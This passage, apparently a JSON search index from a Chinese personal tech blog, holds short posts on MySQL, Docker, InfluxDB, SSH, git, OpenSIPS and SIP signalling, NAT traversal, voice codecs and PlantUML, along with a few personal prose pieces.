当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。","title":"如何面对未知的项目"},{"content":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。\n","permalink":"https://wdd.js.org/posts/2019/10/an4am1/","summary":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。","title":"一个人喝粥太淡"},{"content":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你\n","permalink":"https://wdd.js.org/posts/2019/10/tgn9th/","summary":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你","title":"你有邮箱吗?"},{"content":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","permalink":"https://wdd.js.org/posts/2019/10/nhrhfr/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","title":"MySql表复制 与 调整字段"},{"content":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","permalink":"https://wdd.js.org/posts/2019/10/gdeknt/","summary":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","title":"理解mysql 表连接"},{"content":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","permalink":"https://wdd.js.org/posts/2019/10/cgr19x/","summary":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","title":"世界名画"},{"content":"刀耕火种:没有docker的时代 想想哪些没有docker时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得行英文很好理解,但是不好翻译,从中抽取三个一个最终要的关键词。\u0026ldquo;High-Velocty\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多少了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务, 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","permalink":"https://wdd.js.org/posts/2019/10/nzpt8a/","summary":"刀耕火种:没有docker的时代 想想哪些没有docker时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得行英文很好理解,但是不好翻译,从中抽取三个一个最终要的关键词。\u0026ldquo;High-Velocty\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多少了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务, 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","title":"虚拟化浪潮"},{"content":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","permalink":"https://wdd.js.org/posts/2019/10/eqgykt/","summary":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","title":"influxdb http操作"},{"content":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包\n","permalink":"https://wdd.js.org/posts/2019/10/swoxa5/","summary":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包","title":"ssh保持连接状态不断开"},{"content":"Notify 使用noify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是他有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度回更快。但是对于依赖180响应的系统,可能要考虑这种没有180相应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都是不必须的可以缺少的。\n","permalink":"https://wdd.js.org/opensips/ch1/ua-answer-mode/","summary":"Notify 使用noify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是他有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度回更快。但是对于依赖180响应的系统,可能要考虑这种没有180相应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都是不必须的可以缺少的。","title":"UA应答模式的实现"},{"content":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了前第一集之后,才发现这个剧是讲述关于婚姻方面问题美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。\n","permalink":"https://wdd.js.org/posts/2019/09/zgwg91/","summary":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了前第一集之后,才发现这个剧是讲述关于婚姻方面问题美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。","title":"致命女人 Why Women Kill"},{"content":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件个目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","permalink":"https://wdd.js.org/posts/2019/09/vccx09/","summary":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件个目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","title":"git 删除未跟踪的文件"},{"content":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = “INVITE”; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","permalink":"https://wdd.js.org/opensips/ch3/elk/","summary":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = “INVITE”; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","title":"opensips日志写入elasticsearch"},{"content":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","permalink":"https://wdd.js.org/posts/2019/09/wn0a02/","summary":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","title":"pdf转ppt工具收集"},{"content":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media/","summary":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","title":"回铃音"},{"content":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media-type/","summary":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","title":"几种常用电话信号音的含义"},{"content":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on brance master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 ","permalink":"https://wdd.js.org/posts/2019/09/msx8i9/","summary":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on brance master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 ","title":"Royal TSX git status 输出乱码"},{"content":"git config --global --unset http.proxy ","permalink":"https://wdd.js.org/posts/2019/09/yko32n/","summary":"git config --global --unset http.proxy ","title":"git取消设置http代理"},{"content":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和receive参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真是出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头使用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/fix-nat/","summary":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和receive参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真是出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头使用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","title":"NAT解决方法"},{"content":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是由专利的,也就说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBA 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视屏 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样评率是8000Hz, 那么每个包的会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个自己的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","permalink":"https://wdd.js.org/opensips/ch4/media-codec/","summary":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是由专利的,也就说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBA 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视屏 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样评率是8000Hz, 那么每个包的会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个自己的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","title":"常见媒体流编码及其特点"},{"content":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","permalink":"https://wdd.js.org/opensips/tools/pjsip/","summary":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","title":"pjsip"},{"content":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时候后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要再深究的路径上走的太深 在走其他路径时,也不要忘记最后要回到A点 ","permalink":"https://wdd.js.org/posts/2019/09/xi7kpf/","summary":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时候后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要再深究的路径上走的太深 在走其他路径时,也不要忘记最后要回到A点 ","title":"关注点分离的问题"},{"content":"web服务器如果是基于tcp的,那么用来监听端口端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,即可以用来做listen的端口,也可以从这个端口主动发消息出去。\n","permalink":"https://wdd.js.org/posts/2019/09/vc8oxs/","summary":"web服务器如果是基于tcp的,那么用来监听端口端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,即可以用来做listen的端口,也可以从这个端口主动发消息出去。","title":"TCP和UDP的区别畅想"},{"content":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob 